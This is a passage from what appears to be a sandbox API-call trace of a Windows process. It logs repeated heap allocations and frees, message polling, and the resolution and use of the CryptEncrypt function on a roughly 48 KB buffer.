cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0190.440] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c10 | out: hHeap=0x25c0000) returned 1 [0190.440] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00d0 | out: hHeap=0x25c0000) returned 1 [0190.440] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6a0 | out: hHeap=0x25c0000) returned 1 [0190.440] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa340 | out: hHeap=0x25c0000) returned 1 [0190.440] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa268 | out: hHeap=0x25c0000) returned 1 [0190.440] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00c0 | out: hHeap=0x25c0000) returned 1 [0190.440] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00b0 | out: hHeap=0x25c0000) returned 1 [0190.440] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0190.440] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d920 | out: hHeap=0x25c0000) returned 1 [0190.440] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0190.440] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00d0 | out: hHeap=0x25c0000) returned 1 [0190.440] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6a0 | out: hHeap=0x25c0000) returned 1 [0190.440] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa340 | out: hHeap=0x25c0000) returned 1 [0190.441] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa268 | out: hHeap=0x25c0000) returned 1 [0190.441] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00c0 | out: hHeap=0x25c0000) returned 1 [0190.441] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00b0 | out: hHeap=0x25c0000) returned 1 [0190.441] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0190.441] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3a0 | out: hHeap=0x25c0000) returned 1 [0190.441] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00a0 | out: hHeap=0x25c0000) returned 1 [0190.441] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00a0 | out: hHeap=0x25c0000) returned 1 [0190.441] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00a0 | out: hHeap=0x25c0000) returned 1 [0190.441] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00a0 | out: hHeap=0x25c0000) returned 1 [0190.441] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c78 | out: hHeap=0x25c0000) returned 1 [0190.441] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00a0 | out: hHeap=0x25c0000) returned 1 [0190.441] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00a0 | out: hHeap=0x25c0000) returned 1 [0190.441] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00b0 | out: hHeap=0x25c0000) returned 1 [0190.441] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7a8 | out: hHeap=0x25c0000) returned 1 [0190.441] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa730 | out: hHeap=0x25c0000) returned 1 [0190.441] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa310 | out: hHeap=0x25c0000) returned 1 [0190.441] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00a0 | out: hHeap=0x25c0000) returned 1 [0190.441] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00a0 | out: hHeap=0x25c0000) returned 1 [0190.441] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c10 | out: hHeap=0x25c0000) returned 1 [0190.441] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00a0 | out: hHeap=0x25c0000) returned 1 [0190.441] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00a0 | out: hHeap=0x25c0000) returned 1 [0190.442] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00b0 | out: hHeap=0x25c0000) returned 1 [0190.442] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa658 | out: hHeap=0x25c0000) returned 1 [0190.442] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5f8 | out: hHeap=0x25c0000) returned 1 [0190.442] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa490 | out: hHeap=0x25c0000) returned 1 [0190.442] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00a0 | out: hHeap=0x25c0000) returned 1 [0190.442] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00a0 | out: hHeap=0x25c0000) returned 1 [0190.442] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00b0 | out: hHeap=0x25c0000) returned 1 [0190.442] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5c8 | out: hHeap=0x25c0000) returned 1 [0190.442] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa760 | out: hHeap=0x25c0000) returned 1 [0190.442] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa718 | out: hHeap=0x25c0000) returned 1 [0190.442] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00a0 | out: hHeap=0x25c0000) returned 1 [0190.442] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00a0 | out: hHeap=0x25c0000) returned 1 [0190.442] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00b0 | out: hHeap=0x25c0000) returned 1 [0190.442] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34be110 | out: hHeap=0x25c0000) returned 1 [0190.442] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00c0 | out: hHeap=0x25c0000) returned 1 [0190.442] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa778 | out: hHeap=0x25c0000) returned 1 [0190.442] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa388 | out: hHeap=0x25c0000) returned 1 [0190.442] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00a0 | out: hHeap=0x25c0000) returned 1 [0190.443] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00a0 | out: hHeap=0x25c0000) returned 1 [0190.443] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0190.443] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00c0 | out: hHeap=0x25c0000) returned 1 [0190.443] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa628 | out: hHeap=0x25c0000) returned 1 [0190.443] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa418 | out: hHeap=0x25c0000) returned 1 [0190.443] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2b0 | out: hHeap=0x25c0000) returned 1 [0190.443] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00a0 | out: hHeap=0x25c0000) returned 1 [0190.443] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0190.443] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa418 | out: hHeap=0x25c0000) returned 1 [0190.443] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00c0 | out: hHeap=0x25c0000) returned 1 [0190.443] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa628 | out: hHeap=0x25c0000) returned 1 [0190.443] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00b0 | out: hHeap=0x25c0000) returned 1 [0190.443] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa418 | out: hHeap=0x25c0000) returned 1 [0190.443] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00c0 | out: hHeap=0x25c0000) returned 1 [0190.443] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa568 | out: hHeap=0x25c0000) returned 1 [0190.443] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00d0 | out: hHeap=0x25c0000) returned 1 [0190.443] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa568 | out: hHeap=0x25c0000) returned 1 [0190.443] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00c0 | out: hHeap=0x25c0000) returned 1 [0190.443] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa418 | out: hHeap=0x25c0000) returned 1 [0190.443] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00e0 | out: hHeap=0x25c0000) returned 1 [0190.444] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa418 | out: hHeap=0x25c0000) returned 1 [0190.444] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00c0 | out: hHeap=0x25c0000) returned 1 [0190.444] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa568 | out: hHeap=0x25c0000) returned 1 [0190.444] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00f0 | out: hHeap=0x25c0000) returned 1 [0190.444] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa568 | out: hHeap=0x25c0000) returned 1 [0190.444] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00c0 | out: hHeap=0x25c0000) returned 1 [0190.444] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa418 | out: hHeap=0x25c0000) returned 1 [0190.444] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0100 | out: hHeap=0x25c0000) returned 1 [0190.444] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa628 | out: hHeap=0x25c0000) returned 1 [0190.444] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa628 | out: hHeap=0x25c0000) returned 1 [0190.444] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00c0 | out: hHeap=0x25c0000) returned 1 [0190.444] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa418 | out: hHeap=0x25c0000) returned 1 [0190.444] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0110 | out: hHeap=0x25c0000) returned 1 [0190.444] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa418 | out: hHeap=0x25c0000) returned 1 [0190.444] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00c0 | out: hHeap=0x25c0000) returned 1 [0190.444] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa628 | out: hHeap=0x25c0000) returned 1 [0190.444] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0120 | out: hHeap=0x25c0000) returned 1 [0190.444] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa628 | out: hHeap=0x25c0000) returned 1 [0190.444] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00c0 | out: hHeap=0x25c0000) returned 1 [0190.444] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa418 | out: hHeap=0x25c0000) returned 1 [0190.444] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0130 | out: hHeap=0x25c0000) returned 1 [0190.444] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0190.445] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x34aa628, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0190.445] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa628 | out: hHeap=0x25c0000) returned 1 [0190.445] GetProcAddress (hModule=0x74d40000, lpProcName="CryptEncrypt") returned 0x74d6779b [0190.445] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa418 | out: hHeap=0x25c0000) returned 1 [0190.445] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0130 | out: hHeap=0x25c0000) returned 1 [0190.445] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1c) returned 0x24b3bc8 [0190.445] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0130 [0190.445] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a00c0 [0190.445] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0140 [0190.445] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0150 [0190.445] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0160 [0190.445] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0170 [0190.445] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0180 [0190.445] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0130 | out: hHeap=0x25c0000) returned 1 [0190.445] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00c0 | out: hHeap=0x25c0000) returned 1 [0190.445] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0140 | out: hHeap=0x25c0000) returned 1 [0190.445] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0150 | out: hHeap=0x25c0000) returned 1 [0190.445] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0160 | out: hHeap=0x25c0000) returned 1 [0190.445] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0170 | out: hHeap=0x25c0000) returned 1 [0190.446] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0180 | out: hHeap=0x25c0000) returned 1 [0190.446] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3bc8 | out: hHeap=0x25c0000) returned 1 [0190.446] CryptEncrypt (in: hKey=0xaa5860, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x8bef68*=0xbeb2, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x8bef68*=0xbeb8) returned 1 [0190.446] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x2416270 [0190.446] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3bc8 [0190.446] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0180 [0190.446] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa418 [0190.446] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa628 [0190.446] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa568 [0190.446] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0170 [0190.446] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa568 | out: hHeap=0x25c0000) returned 1 [0190.446] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0170 | out: hHeap=0x25c0000) returned 1 [0190.446] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa628 | out: hHeap=0x25c0000) returned 1 [0190.446] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa628 [0190.446] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa568 [0190.446] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa478 [0190.446] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0170 [0190.446] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa478 | out: hHeap=0x25c0000) returned 1 [0190.446] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0170 | out: hHeap=0x25c0000) returned 1 [0190.446] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa568 | out: hHeap=0x25c0000) returned 1 [0190.446] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa568 [0190.446] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa478 [0190.446] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6d0 [0190.447] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0170 [0190.447] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6d0 | out: hHeap=0x25c0000) returned 1 [0190.447] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0170 | out: hHeap=0x25c0000) returned 1 [0190.447] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa478 | out: hHeap=0x25c0000) returned 1 [0190.447] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa478 [0190.447] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6d0 [0190.447] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa688 [0190.447] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0170 [0190.447] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa688 | out: hHeap=0x25c0000) returned 1 [0190.447] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0170 | out: hHeap=0x25c0000) returned 1 [0190.447] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6d0 | out: hHeap=0x25c0000) returned 1 [0190.447] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6d0 [0190.447] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa688 [0190.447] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa358 [0190.447] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0170 [0190.447] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa358 | out: hHeap=0x25c0000) returned 1 [0190.447] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0170 | out: hHeap=0x25c0000) returned 1 [0190.447] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa688 | out: hHeap=0x25c0000) returned 1 [0190.447] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa688 [0190.447] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa358 [0190.447] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2e0 [0190.447] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0170 [0190.448] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2e0 | out: hHeap=0x25c0000) returned 1 [0190.448] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0170 | out: hHeap=0x25c0000) returned 1 [0190.448] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa358 | out: hHeap=0x25c0000) returned 1 [0190.448] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa358 [0190.448] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2e0 [0190.448] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4d8 [0190.448] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0170 [0190.448] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4d8 | out: hHeap=0x25c0000) returned 1 [0190.448] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0170 | out: hHeap=0x25c0000) returned 1 [0190.448] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2e0 | out: hHeap=0x25c0000) returned 1 [0190.448] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2e0 [0190.448] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4d8 [0190.448] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa538 [0190.448] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0170 [0190.448] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa538 | out: hHeap=0x25c0000) returned 1 [0190.448] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0170 | out: hHeap=0x25c0000) returned 1 [0190.448] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4d8 | out: hHeap=0x25c0000) returned 1 [0190.448] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0190.448] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0080 [0190.448] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00a0 [0190.448] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0120 [0190.449] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466dd0 [0190.449] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0110 [0190.449] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa550 [0190.449] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa790 [0190.449] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0100 [0190.449] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa280 [0190.449] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0190.449] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0190.449] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0080 [0190.449] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00a0 [0190.449] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa550 [0190.449] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa790 [0190.449] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0120 [0190.449] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa280 [0190.449] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0190.449] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0060 [0190.449] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4f0 [0190.449] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5b0 [0190.449] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0080 [0190.449] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa550 [0190.450] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00a0 [0190.450] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466dd0 [0190.450] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa790 [0190.450] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa280 [0190.450] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0120 [0190.450] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0110 [0190.450] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c10 [0190.450] CharLowerBuffW (in: lpsz="byte[48824]", cchLength=0xb | out: lpsz="byte[48824]") returned 0xb [0190.450] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x24) returned 0x249f1a0 [0190.450] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa790 [0190.450] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a00a0 [0190.450] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa280 [0190.450] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0120 [0190.450] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa388 [0190.450] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0100 [0190.450] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa778 [0190.450] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a00f0 [0190.450] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0190.450] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa790 [0190.450] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4f0 [0190.450] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00a0 [0190.450] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466dd0 [0190.451] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x24) returned 0x249f1a0 [0190.451] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5b0 [0190.451] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0060 [0190.453] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0190.453] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00a0 [0190.453] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, 